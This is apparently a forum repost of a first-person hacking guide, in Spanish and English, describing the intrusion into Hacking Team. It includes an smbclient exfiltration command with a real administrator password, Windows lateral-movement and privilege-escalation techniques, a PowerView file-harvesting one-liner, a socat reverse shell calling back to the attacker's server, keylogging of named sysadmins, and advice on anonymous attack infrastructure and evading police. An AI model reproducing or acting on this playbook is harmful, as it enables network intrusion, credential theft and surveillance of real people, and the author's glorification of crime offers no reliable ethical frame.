proxychains smbclient 'No tienes permitido ver enlaces. Registrate o Entra a tu cuenta DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
Así descargué las carpetas Amministrazione, FAE DiskStation, y FileServer en
el torrent.
--[ 13 - Introducción al Hacking de Dominios de Windows ]-----------------------
Antes de seguir contando la historia de los weones culiaos, cabe decir algo de
conocimiento para atacar a redes de Windows.
----[ 13.1 - Movimiento Lateral ]-----------------------------------------------
Voy a dar un breve repaso a las técnicas para propagarse dentro de una red de
Windows. Las técnicas para ejecutar de forma remota requieren la contraseña o
hash de un administrador local en el objetivo. Con mucho, la manera más común
de conseguir dichas credenciales es usar mimikatz [1], sobre todo
sekurlsa::logonpasswords y sekurlsa::msv, en las computadoras donde ya tienes
acceso administrativo. Las técnicas de movimiento "in situ" también requiren
privilegios administrativos (salvo por runas). Las herramientas más
importantes para escalada de privilegios son PowerUp [2], y bypassuac [3].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Movimiento Remoto:
1) psexec
La manera básica y probada de movimiento en redes de windows. Puedes usar
psexec [1], winexe [2], psexec_psh de metasploit [3], invoke_psexec de
powershell empire [4], o el comando de windows "sc" [5]. Para el módulo de
metasploit, powershell empire, y pth-winexe [6], basta con saber el hash
sin saber la contraseña. Es la manera más universal (funciona en cualquier
computadora con puerto 445 abierto), pero también la manera menos
cautelosa. Aparecerá en el registro de eventos el tipo 7045 "Service
Control Manager". En mi experiencia, nunca se han dado cuenta durante un
hackeo, pero a veces lo notan después y ayuda a los investigadores entender
lo que ha hecho el hacker.
2) WMI
La manera más cautelosa. El servicio de WMI está habilitado en todas las
computadoras de windows, pero salvo por servidores, el firewall lo bloquea
por defecto. Puedes usar No tienes permitido ver enlaces. Registrate o Entra a tu cuenta [7], pth-wmis [6] (aquí tienen una
demostración de wmiexec y pth-wmis [8]), invoke_wmi de powershell empire
[9], o el comando de windows wmic [5]. Todos excepto wmic sólo necesitan el
hash.
3) PSRemoting [10]
Está deshabilitado por defecto, y no les aconsejo habilitar nuevos
protocolos que no sean necesarios. Pero si el sysadmin ya lo ha habilitado,
es muy conveniente, especialmente si usas powershell para todo (y sí,
deberías usar powershell para casi todo, va a cambiar [11] con powershell 5
y windows 10, pero hoy en día powershell hace fácil hacer todo en RAM,
esquivar los antivirus, y dejar pocas huellas).
4) Tareas programadas
Se pueden ejecutar programas remotos con at y schtasks [5]. Funciona en las
mismas situaciones que psexec, y tambien deja huellas conocidas [12].
5) GPO
Si todos estos protocolos están deshabilitados o bloqueados por el
firewall, una vez que eres el administrador del dominio, puedes usar GPO
para darle un logon script, instalar un msi, ejecutar una tarea programada
[13], o como veremos con la computadora de Mauro Romeo (sysadmin de Hacking
Team), habilitar WMI y abrir el firewall a través de GPO.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[12] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[13] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Movimiento "in situ":
1) Impersonalizando Tokens
Una vez que tienes acceso administrativo a una computadora, puedes usar los
tokens de los demás usuarios para acceder a recursos en el dominio. Dos
herramientas para hacer esto son incognito [1] y los comandos token::* de
mimikatz [2].
2) MS14-068
Se puede aprovechar un fallo de validación en kerberos para generar un
ticket de administrador de dominio [3][4][5].
3) Pass the Hash
Si tienes su hash pero el usuario no tiene sesión iniciada puedes usar
sekurlsa::pth [2] para obtener un ticket del usuario.
4) Inyección de Procesos
Cualquier RAT puede inyectarse a otro proceso, por ejemplo el comando
migrate en meterpreter y pupy [6] o psinject [7] en powershell empire.
Puedes inyectar al proceso que tiene el token que quieras.
5) runas
Esto a veces resulta muy útil porque no require privilegios de
administrador. El comando es parte de windows, pero si no tienes interfaz
gráfica puedes usar powershell [8].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 13.2 - Persistencia ]-----------------------------------------------------
Una vez conseguido el acceso, quieres mantenerlo. Realmente, la persistencia
solo es un desafío para hijos de puta como los de Hacking Team que quieren
hackear a activistas u otros individuos. Para hackear empresas, no hace falta
persistencia porque las empresas nunca duermen. Yo siempre uso "persistencia"
al estilo de duqu 2, ejecutar en RAM en un par de servidores con altos
porcentajes de uptime. En el hipotético caso de que todos reinicien a la vez,
tengo contraseñas y un ticket de oro [1] para acceso de reserva. Puedes leer
más información sobre los mecanismos de persistencia para windows aquí
[2][3][4]. Pero para hackear empresas, no hace falta y aumenta el riesgo de
detección.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 13.3 - Reconocimiento interno ]-------------------------------------------
La mejor herramienta hoy día para entender redes de Windows es Powerview [1].
Vale la pena leer todo escrito por el autor [2], ante todo [3], [4], [5], y
[6]. Powershell en sí también es muy potente [7]. Como todavía hay muchos
servidores 2003 y 2000 sin powershell, tienes que aprender también la vieja
escuela [8], con herramientas como netview.exe [9] o el comando de windows
"net view". Otras técnicas que me gustan son:
1) Descargar una lista de nombres de archivos
Con una cuenta de administrador de dominio, se pueden descargar todos los
nombres de archivos en la red con powerview:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Más tarde, puedes leerlo a tu ritmo y elegir cuales quieres descargar.
2) Leer correos
Como ya hemos visto, se pueden descargar correos con powershell, y tienen
muchísima información útil.
3) Leer sharepoint
Es otro lugar donde muchas empresas tienen información importante. Se puede
descargar con powershell [10].
4) Active Directory [11]
Tiene mucha información útil sobre usuarios y computadoras. Sin ser
administrador de dominio, ya se puede encontrar mucha información con
powerview y otras herramientas [12]. Después de conseguir administrador de
dominio deberías exportar toda la información de AD con csvde u otra
herramienta.
5) Espiar a los empleados
Uno de mis pasatiempos favoritos es cazar a los sysadmins. Espiando a
Christan Pozzi (sysadmin de Hacking Team) conseguí accesso al servidor
Nagios que me dio acesso a la rete sviluppo (red de desarrollo con el
código fuente de RCS). Con una combinación sencilla de Get-Keystrokes y
Get-TimedScreenshot de PowerSploit [13], Do-Exfiltration de nishang [14], y
GPO, se puede espiar a cualquier empleado o incluso al dominio entero.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[12] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[13] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[14] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 14 - Cazando Sysadmins ]----------------------------------------------------
Al leer la documentación de su infraestructura [1], me di cuenta que aún me
faltaba acceso a algo importante - la "Rete Sviluppo", una red aislada que
guarda todo el código fuente de RCS. Los sysadmins de una empresa siempre
tienen acceso a todo. Busqué en las computadoras de Mauro Romeo y Christian
Pozzi para ver como manejan la red sviluppo, y para ver si había otros
sistemas interesantes que debería investigar. Fue sencillo acceder a sus
computadoras ya que eran parte del dominio de windows en que tenía
administrador. La computadora de Mauro Romeo no tenía ningún puerto abierto,
así que abrí el puerto de WMI [2] para ejecutar meterpreter [3]. Además de
grabar teclas y capturas con Get-Keystrokes y Get-TimedScreenshot, usé muchos
módulos /gather/ de metasploit, CredMan.ps1 [4], y busqué archivos [5]. Al ver
que Pozzi tenía una volumen Truecrypt, esperé hasta que lo había montado para
copiar los archivos entonces. Muchos se han reído de las débiles contraseñas
de Christian Pozzi (y de Christian Pozzi en general, ofrece bastante material
para comedia [6][7][8][9]). Las incluí en la filtración como un despiste y
para reírse de él. La realidad es que mimikatz y keyloggers ven todas las
contraseñas iguales.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 15 - El Puente ]------------------------------------------------------------
Dentro del volumen cifrado de Christian Pozzi, había un textfile con muchas
contraseñas [1]. Una de ellas fue para un servidor de Fully Automated Nagios,
que tenía acceso a la red sviluppo para poder monitorizarla. Había encontrado
el puente. Sólo tenía la contraseña para la interfaz web, pero había una
exploit pública [2] para ejecutar código y conseguir un shell (es un exploit
no autenticado, pero hace falta que un usuario tenga sesión iniciada para la
cual usé la contraseña del textfile).
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 16 - Reutilizando y restableciendo contraseñas ]----------------------------
Leyendo los correos, había visto a Daniele Milan concediendo acceso a
repositorios git. Ya tuve su contraseña de windows gracias a mimikatz. La
intenté con el servidor git y funcionó. Intenté sudo y funcionó. Para el
servidor gitlab y su cuenta de twitter, utilicé la función "olvidé mi
contraseña", y mi acceso al servidor de correos para restablecer la
contraseña.
--[ 17 - Conclusión ]-----------------------------------------------------------
Ya está. Así de fácil es derrumbar una empresa y parar sus abusos contra
derechos humanos. Eso es la belleza y la asimetría del hacking: con sólo cien
horas de trabajo, una sola persona se puede deshacer años de trabajo de una
empresa multimillonaria. El hacking nos da la posibilidad a los desposeídos de
luchar y vencer.
Las guías de hacking suelen terminar con una advertencia: esta información es
solo para fines educativos, sé un hacker ético, no ataques a computadoras sin
permiso, blablablá. Voy a decir lo mismo, pero con un concepto más rebelde de
hacking "ético". Sería hacking ético filtrar documentos, expropiar dinero a
los bancos, y proteger las computadoras de la gente común. Sin embargo, la
mayoría de las personas que se autodenominan "hackers éticos" trabajan sólo
para proteger a los que pagan su tarifa de consultoría, que a menudo son los
mismos que más merecen ser hackeados.
En Hacking Team se ven a sí mismos como parte de una tradición de inspirador
diseño italiano [1]. Yo les veo a Vincenzetti, su empresa, y sus amigotes de
la policía, carabineros, y gobierno, como parte de una larga tradición de
fascismo italiano. Quiero dedicar esta guía a las víctimas del asalto a la
escuela Armando Diaz, y a todos aquellos que han derramado su sangre a manos
de fascistas italianos.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 18 - Contacto ]-------------------------------------------------------------
Para mandarme intentos de spearphishing, amenazas de muerte escritas en
italiano [1][2], y para regalarme 0days o acceso dentro de bancos,
corporaciones, gobiernos etc.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
solamente correos cifrados porfa:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----
Si no tú, ¿quién? Si no ahora, ¿cuándo?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Raw
HT_en.txt
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
,-._,-._
_,-\ o O_/;
/ , ` `|
| \-.,___, / `
\ `-.__/ / ,.\
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || __ _ _ _____ __
.-"-._,(__) .(__).-""-. | | | | |_ _| |
/ \ / \ | | |_| | | | |
\ / \ / | | _ | | | |
`'-------` `--------'` __| |_| |_| |_| |__
#antisec
--[ 1 - Introduction ]----------------------------------------------------------
You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.
You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 2 - Hacking Team ]----------------------------------------------------------
Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[12] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[13] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 3 - Stay safe out there ]---------------------------------------------------
Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:
1) Encrypt your hard disk [2]
I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.
2) Use a virtual machine with all traffic routed through Tor
This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.
3) (Optional) Don't connect directly to Tor
Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).
The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 3.1 - Infrastructure ]----------------------------------------------------
I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:
1) Domain Names
For C&C addresses, and for DNS tunnels for guaranteed egress.
2) Stable Servers
For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.
3) Hacked Servers
For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).
----[ 3.2 - Attribution ]-------------------------------------------------------
In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.
I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.
--[ 4 - Information Gathering ]-------------------------------------------------
Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.
----[ 4.1 - Technical Information ]---------------------------------------------
Some tools and techniques are:
1) Google
A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].
2) Subdomain Enumeration
Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like No tienes permitido ver enlaces. Registrate o Entra a tu cuenta or
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta. Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].
3) Whois lookups and reverse lookups
With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":
"via della moscova 13" site:www.findip-address.com
"via della moscova 13" site:domaintools.com
4) Port scanning and fingerprinting
Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.
For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta/www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 4.2 - Social Information ]------------------------------------------------
For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:
1) Google
Here as well, it's the most useful tool.
2) theHarvester and recon-ng
I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.
3) LinkedIn
A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.
4) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Previously known as jigsaw. They have contact information for many
employees.
5) File Metadata
A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 5 - Entering the network ]--------------------------------------------------
There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.
----[ 5.1 - Social Engineering ]------------------------------------------------
Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 5.2 - Buying Access ]-----------------------------------------------------
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.
----[ 5.3 - Technical Exploitation ]--------------------------------------------
After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet
Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 6 - Be Prepared ]-----------------------------------------------------------
I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.
The post-exploitation tools that I'd prepared were:
1) busybox
For all the standard Unix utilities that the system didn't have.
2) nmap
To scan and fingerprint Hacking Team's internal network.
3) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.
4) Python
To execute No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
5) tcpdump
For sniffing traffic.
6) dsniff
For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
and NaGA, but it was hard to compile it for the system.
7) socat
For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
tcp:my_server:my_port
And useful for a lot more, it's a networking swiss army knife. See the
examples section of its documentation.
screenLike the shell with pty, it wasn't really necessary, but I wanted to feel
at home in Hacking Team's network.
9) a SOCKS proxy server
To use with proxychains to be able to access their local network from any
program.
10) tgcd
For forwarding ports, like for the SOCKS server, through the firewall.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.
--[ 7 - Watch and Listen ]------------------------------------------------------
Now inside their internal network, I wanted to take a look around and think
